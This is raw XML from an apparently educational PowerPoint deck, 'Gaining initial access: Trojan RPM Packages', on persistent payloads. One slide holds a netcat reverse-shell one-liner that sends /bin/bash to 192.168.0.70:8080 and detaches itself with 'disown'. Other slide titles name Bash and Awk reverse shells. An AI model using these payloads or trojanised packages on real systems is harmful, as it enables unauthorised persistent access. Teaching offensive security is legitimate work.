            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{528A222B-FBB4-4E2B-8F7B-BC9DB11E9F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Lots of examples  about persistent payloads…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399878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EE7-3C4F-498C-A237-CB6C326142F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What is a persistent payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{528A222B-FBB4-4E2B-8F7B-BC9DB11E9F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A payload which allows continuous access to the target system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Common payloads which involve reverse shells can be easily killed using accidental calls of SIGKILL or lack of configuration to prevent SIGKILL from causing a killed connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Persistent payloads </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347725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1</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> -e /bin/bash 192.168.0.70 8080 &amp; disown; exit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230102481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606</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>49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Calisto MT</vt:lpstr>
      <vt:lpstr>Univers Condensed</vt:lpstr>
      <vt:lpstr>ChronicleVTI</vt:lpstr>
      <vt:lpstr>Gaining initial access: Trojan RPM Packages</vt:lpstr>
      <vt:lpstr>Copyright permissions</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Overview of RPM installation</vt:lpstr>
      <vt:lpstr>Components of an RPM package</vt:lpstr>
      <vt:lpstr>Fancy diagram goes in this slide.</vt:lpstr>
      <vt:lpstr>Persistent/Automated Payloads</vt:lpstr>
      <vt:lpstr>What is a persistent payload</vt:lpstr>
      <vt:lpstr>Persistent payload 1</vt:lpstr>
      <vt:lpstr>Persistent payload 1 explained</vt:lpstr>
      <vt:lpstr>Persistent payload 2 – Bash reverse shell</vt:lpstr>
      <vt:lpstr>Persistent payload 2 – Bash reverse shell</vt:lpstr>
      <vt:lpstr>Persistent payload 3 – Awk one liner</vt:lpstr>
      <vt:lpstr>Perhaps an embedded video which will show the target downloading the payload.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Gaining initial access: Trojan RPM Packages</dc:title>
  <dc:creator>Aqeeb Hussain</dc:creator>
  <cp:lastModifiedBy>HUSSAIN, AQEEB R.</cp:lastModifiedBy>
  <cp:revision>57</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-12T00:04:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-07T11:33:22Z</dcterms:modified>
</cp:coreProperties>
</file>